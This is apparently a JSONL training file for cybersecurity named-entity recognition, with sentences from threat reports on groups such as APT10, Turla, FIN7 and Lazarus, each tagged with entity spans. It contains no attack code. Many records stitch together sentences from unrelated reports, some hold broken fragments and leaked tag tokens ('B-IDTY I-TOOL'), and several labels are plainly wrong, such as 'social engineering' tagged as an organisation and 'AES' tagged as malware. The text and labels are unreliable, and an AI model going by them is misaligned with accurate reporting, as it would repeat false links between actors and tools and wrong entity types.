{"text": "It contains encrypted java archive “ start.ogg ” in the assets directory and dynamically loads code with dalvik.system.DexClassLoader . One of the favorite methods used by the Pitty Tiger group to infect users is to use a Microsoft Office Word document which exploits a specific vulnerability ( CVE-2012-0158 ) . This operation has targeted managed IT service providers , the compromise of which provides APT10 with potential access to thousands of further victims .", "spans": {"THREAT_ACTOR: Pitty Tiger group": [[176, 193]], "MALWARE: Microsoft Office Word document": [[222, 252]], "VULNERABILITY: CVE-2012-0158": [[295, 308]], "ORGANIZATION: managed IT service providers": [[341, 369]], "THREAT_ACTOR: APT10": [[405, 410]]}, "info": {"id": "cyberner_stix_train_006774", "source": "cyberner_stix_train"}}
{"text": "First described by Kaspersky in 2014 and later by Cylance in 2017 , Machete is a piece of malware found to be targeting high profile individuals and organizations in Latin American countries . The initial indicator of the attack was a malicious Web shell that was detected on an IIS server , coming out of the w3wp.exe process .", "spans": {"ORGANIZATION: Kaspersky": [[19, 28]], "ORGANIZATION: Cylance": [[50, 57]], "TOOL: Machete": [[68, 75]], "TOOL: Web shell": [[245, 254]], "TOOL: IIS": [[279, 282]], "FILEPATH: w3wp.exe": [[310, 318]]}, "info": {"id": "cyberner_stix_train_006775", "source": "cyberner_stix_train"}}
{"text": "X-Force IRIS researchers studied Shamoon ’s attack life cycle and observed its tactics at Saudi-based organizations and private sector companies .", "spans": {"ORGANIZATION: X-Force IRIS": [[0, 12]], "MALWARE: Shamoon": [[33, 40]]}, "info": {"id": "cyberner_stix_train_006776", "source": "cyberner_stix_train"}}
{"text": "Again , this deployment was likely a part of their focus on NATO targets .", "spans": {"ORGANIZATION: NATO": [[60, 64]]}, "info": {"id": "cyberner_stix_train_006777", "source": "cyberner_stix_train"}}
{"text": "Researching this attack and the malware used therein led Microsoft to discover other instances of PLATINUM attacking users in India around August 2015 . Throughout the years , the Mofang group has compromised countless servers belonging to government or other Myanmar related organizations , in order to stage attacks .", "spans": {"ORGANIZATION: Microsoft": [[57, 66]], "THREAT_ACTOR: PLATINUM": [[98, 106]], "ORGANIZATION: users": [[117, 122]], "ORGANIZATION: government": [[240, 250]]}, "info": {"id": "cyberner_stix_train_006778", "source": "cyberner_stix_train"}}
{"text": "We don't have hard evidence of how Suckfly obtained information on the targeted user , but we did find a large open-source presence on the initial target .", "spans": {"THREAT_ACTOR: Suckfly": [[35, 42]]}, "info": {"id": "cyberner_stix_train_006779", "source": "cyberner_stix_train"}}
{"text": "A well-funded , highly active BlackOasis group of Middle Eastern hackers was caught , yet again , using a lucrative zero-day exploit in the wild to break into computers and infect them with powerful spyware developed by an infamous cyberweapons dealer named Gamma Group . We also observed exploits against older ( patched ) vulnerabilities , social engineering techniques and watering hole strategies in these attacks .", "spans": {"THREAT_ACTOR: BlackOasis group": [[30, 46]], "THREAT_ACTOR: hackers": [[65, 72]], "VULNERABILITY: zero-day exploit": [[116, 132]], "THREAT_ACTOR: Gamma Group": [[258, 269]], "ORGANIZATION: social engineering": [[342, 360]]}, "info": {"id": "cyberner_stix_train_006780", "source": "cyberner_stix_train"}}
{"text": "Second , the hex-encoded string is the C&C used by the custom backdoor while in the Delphi backdoor the C&C is embedded in the configuration .", "spans": {"TOOL: C&C": [[39, 42], [104, 107]], "TOOL: Delphi": [[84, 90]]}, "info": {"id": "cyberner_stix_train_006781", "source": "cyberner_stix_train"}}
{"text": "We detonated the file in VxStream ’s automated malware analysis capability and found testproj.exe dropped a benign Microsoft Word document that pulls a jpg file from treestower.com .", "spans": {"TOOL: VxStream": [[25, 33]], "FILEPATH: testproj.exe": [[85, 97]], "ORGANIZATION: Microsoft": [[115, 124]], "TOOL: Word": [[125, 129]], "DOMAIN: treestower.com": [[166, 180]]}, "info": {"id": "cyberner_stix_train_006782", "source": "cyberner_stix_train"}}
{"text": "Many of the default strings in this application are in Arabic , including the name . In 2010 US-based HBGary investigated an information security incident related to the Winnti group at one of HBGary 's customers – an American video game company . If a user or an application modifies the ZxShell service registry key , the code restores the original infected service key and values . The majority of the Excel campaigns show some element of luring the user to enable macros in Excel with specific content using Ukrainian language .", "spans": {"ORGANIZATION: HBGary": [[102, 108], [193, 199]], "ORGANIZATION: video game company": [[227, 245]], "MALWARE: ZxShell": [[289, 296]]}, "info": {"id": "cyberner_stix_train_006783", "source": "cyberner_stix_train"}}
{"text": "On March 12 and March 14 , we observed the Sofacy group carrying out an attack on a European government agency involving an updated variant of DealersChoice .", "spans": {"THREAT_ACTOR: Sofacy": [[43, 49]], "TOOL: DealersChoice": [[143, 156]]}, "info": {"id": "cyberner_stix_train_006784", "source": "cyberner_stix_train"}}
{"text": "] 102 2020-04-14 http : //pub.douglasshome [ . Both BalkanRAT and BalkanDoor spread in Croatia , Serbia , Montenegro , and Bosnia and Herzegovina . menuPass also heavily favors spear phishing , and so takes steps to socially engineer their spear phishes for maximum appearance of legitimacy .", "spans": {"MALWARE: BalkanRAT": [[52, 61]], "MALWARE: BalkanDoor": [[66, 76]]}, "info": {"id": "cyberner_stix_train_006785", "source": "cyberner_stix_train"}}
{"text": "Being aware of this fact can help create defensive strategies , as well as prepare for upcoming attacks . Instead , we observed the two Russian espionage groups compromise the same systems and engage separately in the theft of identical credentials . The processor function builds a list of files from the files with content that match rcvd* in the receivebox . Vice Society ’s targeting of education is undoubtedly deliberate and has likely allowed the gang to develop domain - specific techniques and expertise .", "spans": {"THREAT_ACTOR: espionage groups": [[144, 160]], "THREAT_ACTOR: Vice Society ’s": [[362, 377]], "ORGANIZATION: education": [[391, 400]]}, "info": {"id": "cyberner_stix_train_006786", "source": "cyberner_stix_train"}}
{"text": "In the observed version of the implant it doesn ’ t have an interface to work with the skype_sync2.exe module . From our first malicious sample encounter back in mid-September until now , we have observed 12 infected applications , the majority of which are in the system utility category . Lotus Blossom is a threat group that has targeted government and military organizations in Southeast Asia .", "spans": {"MALWARE: malicious sample": [[127, 143]], "THREAT_ACTOR: Lotus Blossom": [[291, 304]]}, "info": {"id": "cyberner_stix_train_006787", "source": "cyberner_stix_train"}}
{"text": "It comes fully loaded with a number of plug-ins to give an attacker complete control of the compromised computer .", "spans": {}, "info": {"id": "cyberner_stix_train_006788", "source": "cyberner_stix_train"}}
{"text": "The group targeting Hong Kong media outlets is called admin@338 and is known to researchers for using publicly available remote access Trojans such as Poison Ivy to attack government and financial firms specializing in global economic policy . Attackers behind Dyre have used similar tactics in the past but have only deployed their attacks in English speaking countries and Spain .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "ORGANIZATION: media": [[30, 35]], "THREAT_ACTOR: admin@338": [[54, 63]], "TOOL: remote access Trojans": [[121, 142]], "TOOL: Poison Ivy": [[151, 161]], "ORGANIZATION: government": [[172, 182]], "ORGANIZATION: financial firms": [[187, 202]], "ORGANIZATION: global economic": [[219, 234]]}, "info": {"id": "cyberner_stix_train_006789", "source": "cyberner_stix_train"}}
{"text": "It appears hacking group Outlaw , which has been silent for the past few months , was simply developing their toolkit for illicit income sources .", "spans": {"THREAT_ACTOR: Outlaw": [[25, 31]]}, "info": {"id": "cyberner_stix_train_006790", "source": "cyberner_stix_train"}}
{"text": "Recently there was a huge wave of SMS messages , as well as Whatsapp messages , making the rounds asking users to download the latest version of TikTok at hxxp : //tiny [ . Throughout our investigation , we have found evidence that shows operational similarities between this implant and Gamaredon Group . Distinct changes to Azazel by the Winnti developers include the addition of a function named ‘ Decrypt2 ’ , which is used to decode an embedded configuration similar to the core implant .", "spans": {"SYSTEM: Whatsapp": [[60, 68]], "SYSTEM: TikTok": [[145, 151]], "MALWARE: implant": [[276, 283]], "THREAT_ACTOR: Gamaredon": [[288, 297]], "TOOL: Azazel": [[326, 332]], "MALWARE: Winnti": [[340, 346]], "TOOL: Decrypt2": [[401, 409]]}, "info": {"id": "cyberner_stix_train_006791", "source": "cyberner_stix_train"}}
{"text": "The data entered by the user is sent to the cybercriminals . When G-Data published on Turla/Uroburos back in February , several questions remained unanswered . ZxShell ( aka Sensocode ) is a Remote Administration Tool ( RAT ) used by Group 72 to conduct cyber-espionage operations . If we look at our previous cyberattack incident , a spear phishing attack likely left indications of malicious browser redirects and malware installation attempts .", "spans": {"ORGANIZATION: G-Data": [[66, 72]], "THREAT_ACTOR: Turla/Uroburos": [[86, 100]], "MALWARE: ZxShell": [[160, 167]], "MALWARE: Sensocode": [[174, 183]], "TOOL: Remote Administration Tool": [[191, 217]], "TOOL: RAT": [[220, 223]], "THREAT_ACTOR: Group 72": [[234, 242]]}, "info": {"id": "cyberner_stix_train_006792", "source": "cyberner_stix_train"}}
{"text": "Sending text “ confirm 1 ” will include proof of payment . The OilRig group ( AKA APT34 , Helix Kitten ) is an adversary motivated by espionage primarily operating in the Middle East region . The fact that this attacker decided to leverage cloud services and four different services — and not their own infrastructure — is smart from an opsec point of view . Monitor and analyze traffic flows that do not follow the expected protocol standards and traffic flows ( e.g extraneous packets that do not belong to established flows , or gratuitous or anomalous traffic patterns ) .", "spans": {"THREAT_ACTOR: OilRig group": [[63, 75]], "THREAT_ACTOR: APT34": [[82, 87]], "THREAT_ACTOR: Helix Kitten": [[90, 102]], "THREAT_ACTOR: espionage": [[134, 143]], "TOOL: cloud services": [[240, 254]], "TOOL: four different services": [[259, 282]]}, "info": {"id": "cyberner_stix_train_006793", "source": "cyberner_stix_train"}}
{"text": "The data targeted for theft also have similar formats . ScarCruft has several ongoing operations , utilizing multiple exploits — two for Adobe Flash and one for Microsoft Internet Explorer . Kaspersky Lab has been able to retrieve some of these exchanges from a FIN7 target . But a potential of attackers to misuse such access to infect hundreds of millions of Internet users creates a great risk . \"", "spans": {"THREAT_ACTOR: ScarCruft": [[56, 65]], "TOOL: Adobe Flash": [[137, 148]], "TOOL: Microsoft Internet Explorer": [[161, 188]], "ORGANIZATION: Kaspersky Lab": [[191, 204]], "THREAT_ACTOR: FIN7": [[262, 266]], "THREAT_ACTOR: attackers": [[295, 304]]}, "info": {"id": "cyberner_stix_train_006794", "source": "cyberner_stix_train"}}
{"text": "This type of activity and the malicious use of stolen certificates emphasizes the importance of safeguarding certificates to prevent them from being used maliciously .", "spans": {}, "info": {"id": "cyberner_stix_train_006795", "source": "cyberner_stix_train"}}
{"text": "In early versions of Asacub , .com , .biz , .info , .in , .pw were used as top-level domains . CTU researchers assess with high confidence that TG-3390 uses information gathered from prior reconnaissance activities to selectively compromise users who visit websites under its control . The honeynet graphs , which show activity peaks associated with specific actions , also suggest that the scans were timed . When ransomware source code or builders are leaked , it becomes easier for aspiring cybercriminals who lack the technical expertise to develop their own ransomware variants by making only minor modifications to the original code .", "spans": {"MALWARE: Asacub": [[21, 27]], "ORGANIZATION: CTU": [[95, 98]], "THREAT_ACTOR: TG-3390": [[144, 151]], "VULNERABILITY: When ransomware source code or builders are leaked": [[410, 460]]}, "info": {"id": "cyberner_stix_train_006796", "source": "cyberner_stix_train"}}
{"text": "PLATINUM 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat . A variety of malware , including the PlugX tool , was shared with other known Chinese threat groups .", "spans": {"THREAT_ACTOR: PLATINUM": [[0, 8]], "VULNERABILITY: zero-day exploits": [[143, 160]], "MALWARE: PlugX tool": [[239, 249]]}, "info": {"id": "cyberner_stix_train_006797", "source": "cyberner_stix_train"}}
{"text": "Note : Industrial safety instrumented systems comprise part of a multi-layer engineered process control framework to protect life and environment .", "spans": {}, "info": {"id": "cyberner_stix_train_006798", "source": "cyberner_stix_train"}}
{"text": "At this point , the attackers know the user has opened the document and send another spear-phishing email , this time containing an MS Word document with an embedded executable . In August and October 2016 we observed a malware operation targeting members of the Tibetan Parliament ( the highest legislative organ of the Tibetan government in exile , formally known as Central Tibetan Administration ) .", "spans": {"THREAT_ACTOR: attackers": [[20, 29]], "MALWARE: MS Word document": [[132, 148]], "ORGANIZATION: Tibetan Parliament": [[263, 281]], "ORGANIZATION: Tibetan government": [[321, 339]], "ORGANIZATION: Central Tibetan Administration": [[369, 399]]}, "info": {"id": "cyberner_stix_train_006799", "source": "cyberner_stix_train"}}
{"text": "Quasar serve does not verify that the size , filename , extension , or header of the uploaded file is the same as requested .", "spans": {"MALWARE: Quasar": [[0, 6]]}, "info": {"id": "cyberner_stix_train_006800", "source": "cyberner_stix_train"}}
{"text": "PROMETHIUM uses a unique set of tools and methods to perform actions like lateral movement and data exfiltration . XENOTIME rose to prominence in December 2017 when Dragos and FireEye jointly published details of TRISIS destructive malware targeting Schneider Electric 's Triconex safety instrumented system .", "spans": {"THREAT_ACTOR: PROMETHIUM": [[0, 10]], "THREAT_ACTOR: XENOTIME": [[115, 123]], "ORGANIZATION: Dragos": [[165, 171]], "ORGANIZATION: FireEye": [[176, 183]], "MALWARE: TRISIS": [[213, 219]]}, "info": {"id": "cyberner_stix_train_006801", "source": "cyberner_stix_train"}}
{"text": "These socially engineered emails contain web links of weaponized documents containing exploits or macros . Cadelle , uses Backdoor.Cadelspy .", "spans": {"MALWARE: Backdoor.Cadelspy": [[122, 139]]}, "info": {"id": "cyberner_stix_train_006802", "source": "cyberner_stix_train"}}
{"text": "The regular expressions suggest that the C2 server responds with content that is meant to resemble HTTP Live Steaming ( HLS ) traffic , which is a protocol that uses HTTP to deliver audio and video files for streaming .", "spans": {"TOOL: C2": [[41, 43]], "TOOL: HTTP Live Steaming": [[99, 117]], "TOOL: HLS": [[120, 123]]}, "info": {"id": "cyberner_stix_train_006803", "source": "cyberner_stix_train"}}
{"text": "The group continued this pattern with occasional URL campaigns and attached HTML files bearing malicious links .", "spans": {"TOOL: HTML": [[76, 80]]}, "info": {"id": "cyberner_stix_train_006804", "source": "cyberner_stix_train"}}
{"text": "All of these domains are registered to ‘ Li Jun Biao ’ on Bizcn , Inc , a Chinese Internet application service provider . From February to April 2019 , MuddyWater launched a series of spear-phishing attacks against governments , educational institutions , financial , telecommunications and defense companies in Turkey , Iran , Afghanistan , Iraq , Tajikistan and Azerbaijan . APT15 then used a tool known as RemoteExec ( similar to Microsoft .", "spans": {"ORGANIZATION: Bizcn , Inc": [[58, 69]], "THREAT_ACTOR: MuddyWater": [[152, 162]], "ORGANIZATION: governments": [[215, 226]], "ORGANIZATION: educational institutions": [[229, 253]], "ORGANIZATION: financial": [[256, 265]], "ORGANIZATION: telecommunications": [[268, 286]], "ORGANIZATION: defense": [[291, 298]], "THREAT_ACTOR: APT15": [[377, 382]], "MALWARE: RemoteExec": [[409, 419]], "ORGANIZATION: Microsoft": [[433, 442]]}, "info": {"id": "cyberner_stix_train_006805", "source": "cyberner_stix_train"}}
{"text": "This technique is associated with the Korplug S-MAL/Plug-x malware and is frequently used in China based cyberespionage activity .", "spans": {"MALWARE: Korplug S-MAL/Plug-x": [[38, 58]]}, "info": {"id": "cyberner_stix_train_006806", "source": "cyberner_stix_train"}}
{"text": "Specifically , on the 19th of January 2010 security researcher Tavis Ormandy disclosed a local privilege escalation vulnerability ( CVE-2010-0232 ) affecting Microsoft Windows .", "spans": {"VULNERABILITY: CVE-2010-0232": [[132, 145]], "ORGANIZATION: Microsoft": [[158, 167]], "SYSTEM: Windows": [[168, 175]]}, "info": {"id": "cyberner_stix_train_006807", "source": "cyberner_stix_train"}}
{"text": "However , full details on XENOTIME and other group tools , techniques , procedures , and infrastructure is available to network defenders via Dragos WorldView .", "spans": {"THREAT_ACTOR: XENOTIME": [[26, 34]], "ORGANIZATION: Dragos": [[142, 148]], "TOOL: WorldView": [[149, 158]]}, "info": {"id": "cyberner_stix_train_006808", "source": "cyberner_stix_train"}}
{"text": "As detailed in the previous section , this malware is able to manipulate and exfiltrate emails . It is worth noting that attackers used the same compromised websites to spread Buhtrap as those that had been used for the Corkow Trojan .", "spans": {"MALWARE: compromised websites": [[145, 165]], "MALWARE: Buhtrap": [[176, 183]], "MALWARE: Corkow Trojan": [[220, 233]]}, "info": {"id": "cyberner_stix_train_006809", "source": "cyberner_stix_train"}}
{"text": "A full list of the domains can be seen here .", "spans": {}, "info": {"id": "cyberner_stix_train_006810", "source": "cyberner_stix_train"}}
{"text": "'' This class will open a WebView with a Google-themed page asking for payment in order to use the Google services . Additional capabilities of the More_eggs malware include the download and execution of files and scripts and running commands using cmd.exe . On occasion the APT37 directly included the ROKRAT payload in the malicious document and during other campaigns the attackers leveraged multi-stage infection processes .", "spans": {"ORGANIZATION: Google-themed": [[41, 54]], "ORGANIZATION: Google": [[99, 105]], "MALWARE: More_eggs malware": [[148, 165]], "MALWARE: cmd.exe": [[249, 256]], "THREAT_ACTOR: APT37": [[275, 280]], "MALWARE: ROKRAT": [[303, 309]], "THREAT_ACTOR: attackers": [[375, 384]]}, "info": {"id": "cyberner_stix_train_006811", "source": "cyberner_stix_train"}}
{"text": "If you want to know more about them — our researchers have an article about them on Securelist . Our analysis shows that NetTraveler attempted to exploit CVE-2012-0158 to install NetTraveler Trojan . In these websites they hosted malware that was digitally signed with a valid , likely stolen code signing certificate .", "spans": {"ORGANIZATION: Securelist": [[84, 94]], "TOOL: NetTraveler": [[121, 132]], "VULNERABILITY: CVE-2012-0158": [[154, 167]], "TOOL: NetTraveler Trojan": [[179, 197]], "MALWARE: stolen code signing certificate": [[286, 317]]}, "info": {"id": "cyberner_stix_train_006812", "source": "cyberner_stix_train"}}
{"text": "RuMMS samples and C2 servers Figure 8 shows how these samples , C2 servers and hosting websites are related to each other , including when they were compiled or observed . This latest attack consisted of three waves between May and June 2018 . We identified three malicious Microsoft Office B-IDTY I-TOOL documents that download and load an additional Office document with a Macro . “ And his access was never shut off until today ? , ” asked the company ’s general counsel Mike Dacks .", "spans": {"MALWARE: RuMMS": [[0, 5]], "TOOL: Microsoft": [[274, 283]], "TOOL: Macro": [[375, 380]], "ORGANIZATION: company ’s general counsel": [[447, 473]], "ORGANIZATION: Mike Dacks": [[474, 484]]}, "info": {"id": "cyberner_stix_train_006813", "source": "cyberner_stix_train"}}
{"text": "At this time of writing , FireEye Multi Vector Execution (MVX) engine is able to recognize and block this threat . This alert 's IOC files provide HIDDEN COBRA indicators related to FALLCHILL .", "spans": {"ORGANIZATION: FireEye": [[26, 33]], "TOOL: (MVX)": [[57, 62]], "FILEPATH: IOC files": [[129, 138]], "THREAT_ACTOR: HIDDEN COBRA": [[147, 159]], "MALWARE: FALLCHILL": [[182, 191]]}, "info": {"id": "cyberner_stix_train_006814", "source": "cyberner_stix_train"}}
{"text": "TimeReceiver android.intent.action.ACTION_TIME_CHANGED System notification that the time was set . Selective deployment of ROCKBOOT suggests that APT41 reserves more advanced TTPs and malware only for high-value targets . Several sources consider APT28 a group of CyberMercs based in Russia .", "spans": {"ORGANIZATION: ROCKBOOT": [[123, 131]], "THREAT_ACTOR: APT41": [[146, 151]], "THREAT_ACTOR: APT28": [[247, 252]]}, "info": {"id": "cyberner_stix_train_006815", "source": "cyberner_stix_train"}}
{"text": "The most advanced mobile malicious programs today are Trojans targeting users ’ bank accounts – the most attractive source of criminal earnings . The malicious loader will use dynamic-link library ( DLL ) hijacking — injecting malicious code into a process of a file/application — on sidebar.exe and launch dllhost.exe ( a normal file ) . Once installed on the system , ShadowPad starts a hidden and suspended Microsoft Windows Media Player wmplayer.exe process and injects itself into that process . Although we have not identified sufficient evidence to determine the origin or purpose of COSMICENERGY , we believe that the malware was possibly developed by either Rostelecom - Solar or an associated party to recreate real attack scenarios against energy grid assets .", "spans": {"MALWARE: sidebar.exe": [[284, 295]], "MALWARE: dllhost.exe": [[307, 318]], "MALWARE: ShadowPad": [[370, 379]], "TOOL: Microsoft Windows Media Player": [[410, 440]], "FILEPATH: wmplayer.exe": [[441, 453]], "MALWARE: COSMICENERGY": [[591, 603]]}, "info": {"id": "cyberner_stix_train_006816", "source": "cyberner_stix_train"}}
{"text": "Unlike HammerDuke however , the URLs for the images downloaded by GeminiDuke are hardcoded in its initial configuration , rather than retrieved from Twitter .", "spans": {"MALWARE: HammerDuke": [[7, 17]], "MALWARE: GeminiDuke": [[66, 76]], "TOOL: Twitter": [[149, 156]]}, "info": {"id": "cyberner_stix_train_006817", "source": "cyberner_stix_train"}}
{"text": "The Conversations modified samples differ from the original one in the getKnownHosts method that was modified to replace the main XMPP host with the attackers ’ C2 server : It appears that the attackers were using a specific C2 for the use of that app . From Buhtrap perpetrating cybercrime for financial gain , its toolset has been expanded with malware used to conduct espionage in Eastern Europe and Central Asia . But before the ScarCruft infection , however , another APT group also targeted this victim with the host being infected with GreezeBackdoor on March 26, 2018 .", "spans": {"SYSTEM: XMPP": [[130, 134]], "THREAT_ACTOR: Buhtrap": [[259, 266]], "THREAT_ACTOR: ScarCruft": [[433, 442]], "MALWARE: GreezeBackdoor": [[543, 557]]}, "info": {"id": "cyberner_stix_train_006818", "source": "cyberner_stix_train"}}
{"text": "Furthermore , it can grant the “ com.qualcmm.timeservices ” app Device Administrator rights without any interaction with the user , just by running commands . Working backwards from each Internet address , I was able to see that in the last few months of 2018 the hackers behind DNSpionage succeeded in compromising key components of DNS infrastructure for more than 50 Middle Eastern companies and government agencies , including targets in Albania , Cyprus , Egypt , Iraq , Jordan , Kuwait , Lebanon , Libya , Saudi Arabia and the United Arab Emirates . We first published details about the APT in our January 2010 M-Trends report . These URLs provide access to the C2s , which then provide potential commands and encrypted transfers of additional backdoors onto the system via GIF files .", "spans": {"ORGANIZATION: companies": [[385, 394]], "ORGANIZATION: government agencies": [[399, 418]], "ORGANIZATION: M-Trends": [[617, 625]]}, "info": {"id": "cyberner_stix_train_006819", "source": "cyberner_stix_train"}}
{"text": "It checks for different kinds of emulators , including QEMU , Genymotion , BlueStacks and Bignox . Attachments are typically sent as an executable file embedded in a ZIP archive or a password-protected Microsoft Office document . Kaspersky Lab verdicts for the malware used in this and related attacks . None After initial access via this new exploit method , the threat actor leveraged maintain access , and performed anti - forensics techniques on the Microsoft Exchange server in an attempt to hide their activity .", "spans": {"SYSTEM: QEMU": [[55, 59]], "SYSTEM: Genymotion": [[62, 72]], "SYSTEM: BlueStacks": [[75, 85]], "SYSTEM: Bignox": [[90, 96]], "MALWARE: Attachments": [[99, 110]], "ORGANIZATION: Kaspersky Lab": [[230, 243]], "THREAT_ACTOR: threat actor": [[364, 376]], "SYSTEM: Microsoft Exchange server": [[454, 479]]}, "info": {"id": "cyberner_stix_train_006820", "source": "cyberner_stix_train"}}
{"text": "For system administrators and information security professionals , configuring the router to be more resistant to attacks like DNS cache poisoning can help mitigate similar threats . Lazarus was linked to the $81 million theft from the Bangladesh central bank in 2016 , along with a number of other bank heists . Since then , threat actors leveraging Winnti malware have victimized a diverse set of targets forvaried motivations .", "spans": {"THREAT_ACTOR: Lazarus": [[183, 190]], "ORGANIZATION: Bangladesh central bank": [[236, 259]], "MALWARE: Winnti": [[351, 357]]}, "info": {"id": "cyberner_stix_train_006821", "source": "cyberner_stix_train"}}
{"text": "Fast forward five months to the current attacks and we see exploitation of the same vulnerability at government organizations in two different countries compared to the April attacks .", "spans": {}, "info": {"id": "cyberner_stix_train_006822", "source": "cyberner_stix_train"}}
{"text": "Using a profiling script to deploy zero-days and other tools more selectively , decreasing the chance that researchers and others will gain access to the group ’s tools .", "spans": {"VULNERABILITY: zero-days": [[35, 44]]}, "info": {"id": "cyberner_stix_train_006823", "source": "cyberner_stix_train"}}
{"text": "Chrysaor was never available in Google Play and had a very low volume of installs outside of Google Play . Another intrusion approach used by Leafminer seems a lot less sophisticated than the previously described methods but can be just as effective : using specific hacktools to guess the login passwords for services exposed by a targeted system . Yet again , new supply-chain attacks recently caught the attention of ESET Researchers . The attackers also leveraged DLL sideloading in that campaign to load their HyperBro malware .", "spans": {"MALWARE: Chrysaor": [[0, 8]], "SYSTEM: Google Play": [[32, 43], [93, 104]], "THREAT_ACTOR: Leafminer": [[142, 151]], "TOOL: hacktools": [[267, 276]], "ORGANIZATION: ESET": [[420, 424]], "THREAT_ACTOR: attackers": [[443, 452]], "MALWARE: HyperBro malware": [[515, 531]]}, "info": {"id": "cyberner_stix_train_006824", "source": "cyberner_stix_train"}}
{"text": "PlugX is a modular structured malware that has many different operational plugins such as communication compression and encryption , network enumeration , files interaction , remote shell operations and more . It employs AES in addition to SID tricks , making it difficult to decrypt sensitive data .", "spans": {"MALWARE: PlugX": [[0, 5]], "MALWARE: AES": [[221, 224]], "MALWARE: SID": [[240, 243]]}, "info": {"id": "cyberner_stix_train_006825", "source": "cyberner_stix_train"}}
{"text": "Transparent Tribe has been active for several years and conducting suspected intelligence collection operations against South Asian political and military targets . Kaspersky Lab products detect the Octopus Trojan as Trojan.Win32.Octopus.gen .", "spans": {"ORGANIZATION: political": [[132, 141]], "ORGANIZATION: military": [[146, 154]], "ORGANIZATION: Kaspersky Lab": [[165, 178]], "MALWARE: Octopus Trojan": [[199, 213]]}, "info": {"id": "cyberner_stix_train_006826", "source": "cyberner_stix_train"}}
{"text": "It loads code from encrypted resources dynamically , which most detection engines can not penetrate and inspect . A preliminary analysis caught the attention of our Threat Analysis and Intelligence team as it yielded interesting data that , among other things , shows that Silence was targeting employees from financial entities , specifically in the Russian Federation and the Republic of Belarus . We also spotted several typical FIN7 targets , such as retailers and hotels . Most do n’t even do much besides Since the most common allowed domain is google-analytics.com ( 17 K websites )", "spans": {"ORGANIZATION: employees": [[295, 304]], "ORGANIZATION: financial entities": [[310, 328]], "THREAT_ACTOR: FIN7": [[432, 436]]}, "info": {"id": "cyberner_stix_train_006827", "source": "cyberner_stix_train"}}
{"text": "CTU researchers have evidence that the TG-3390 compromised U.S and UK organizations in the following verticals : manufacturing ( specifically aerospace ( including defense contractors ) , automotive , technology , energy , and pharmaceuticals ) , education , and legal , as well as organizations focused on international relations . The first ( port 5555 ) proxy first finds the IP parameter .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "THREAT_ACTOR: TG-3390": [[39, 46]], "ORGANIZATION: manufacturing": [[113, 126]], "ORGANIZATION: aerospace": [[142, 151]], "ORGANIZATION: defense contractors": [[164, 183]], "ORGANIZATION: automotive": [[188, 198]], "ORGANIZATION: technology": [[201, 211]], "ORGANIZATION: energy": [[214, 220]], "ORGANIZATION: pharmaceuticals": [[227, 242]], "ORGANIZATION: education": [[247, 256]], "ORGANIZATION: legal": [[263, 268]]}, "info": {"id": "cyberner_stix_train_006828", "source": "cyberner_stix_train"}}
{"text": "Both attachments are malicious Word documents that attempt to exploit the Windows OLE Automation Array Remote Code Execution Vulnerability tracked by CVE-2014-6332 . The initially-observed \" thanks.pps \" example tricks the user into running the embedded file named ins8376.exe which loads a payload DLL named mpro324.dll .", "spans": {"MALWARE: malicious Word documents": [[21, 45]], "VULNERABILITY: Windows OLE Automation Array Remote Code Execution Vulnerability": [[74, 138]], "VULNERABILITY: CVE-2014-6332": [[150, 163]], "FILEPATH: thanks.pps": [[191, 201]], "FILEPATH: ins8376.exe": [[265, 276]], "TOOL: DLL": [[299, 302]], "FILEPATH: mpro324.dll": [[309, 320]]}, "info": {"id": "cyberner_stix_train_006829", "source": "cyberner_stix_train"}}
{"text": "The payload features are similar to the previous versions of Seduploader .", "spans": {"MALWARE: Seduploader": [[61, 72]]}, "info": {"id": "cyberner_stix_train_006830", "source": "cyberner_stix_train"}}
{"text": "This information can provide an initial means by which to assess the scope of the breach .", "spans": {}, "info": {"id": "cyberner_stix_train_006831", "source": "cyberner_stix_train"}}
{"text": "At the same time , cybercriminals are reluctant to change the method of communication with the C & C server , since this would require more effort and reap less benefit than modifying the executable file . BRONZE UNION threat campaigns that illustrate the evolution of the group 's methods and espionage objectives . Users can also adopt a multilayered security solution that can protect systems from the gateway to the endpoint , actively blocking malicious URLs by employing filtering , behavioral analysis , and custom sandboxing . Later in the month , Microsoft officially confirmed that numerous outages of its products were a direct result of DDoS attacks conducted by Anonymous Sudan .", "spans": {"THREAT_ACTOR: DDoS attacks": [[649, 661]], "THREAT_ACTOR: Anonymous Sudan": [[675, 690]]}, "info": {"id": "cyberner_stix_train_006832", "source": "cyberner_stix_train"}}
{"text": "PUTTER PANDA is a determined adversary group , conducting intelligence-gathering operations targeting the Government , Defense , Research , and Technology sectors in the United States , with specific targeting of the US Defense and European satellite and aerospace industries . The C&C server ( 82.137.255.56 ) used by the above backdoors was used by APT-C-27 ( Goldmouse ) many times since 2017 .", "spans": {"THREAT_ACTOR: PUTTER PANDA": [[0, 12]], "THREAT_ACTOR: group": [[39, 44]], "ORGANIZATION: Government": [[106, 116]], "ORGANIZATION: Defense": [[119, 126]], "ORGANIZATION: Research": [[129, 137]], "ORGANIZATION: Technology sectors": [[144, 162]], "ORGANIZATION: US Defense": [[217, 227]], "ORGANIZATION: satellite": [[241, 250]], "ORGANIZATION: aerospace industries": [[255, 275]], "TOOL: C&C": [[282, 285]], "IP_ADDRESS: 82.137.255.56": [[295, 308]], "THREAT_ACTOR: APT-C-27": [[351, 359]], "THREAT_ACTOR: Goldmouse": [[362, 371]]}, "info": {"id": "cyberner_stix_train_006833", "source": "cyberner_stix_train"}}
{"text": "The following are IOCs related to this domain :", "spans": {"TOOL: IOCs": [[18, 22]]}, "info": {"id": "cyberner_stix_train_006834", "source": "cyberner_stix_train"}}
{"text": "addWifiConfig method code fragments ‘ camera ’ – this command records a video/capture a photo using the front-facing camera when someone next unlocks the device . For example , on a Saudi government website , the NewsBeef APT delivered packed JavaScript into the bottom of a referenced script that is included in every page served from the site the packed and unpacked JavaScript is shown below . They have targeted the telecommunication and travel industries to collect personal information that aligns with Iran 's national priorities .", "spans": {"THREAT_ACTOR: NewsBeef": [[213, 221]], "TOOL: JavaScript": [[369, 379]]}, "info": {"id": "cyberner_stix_train_006835", "source": "cyberner_stix_train"}}
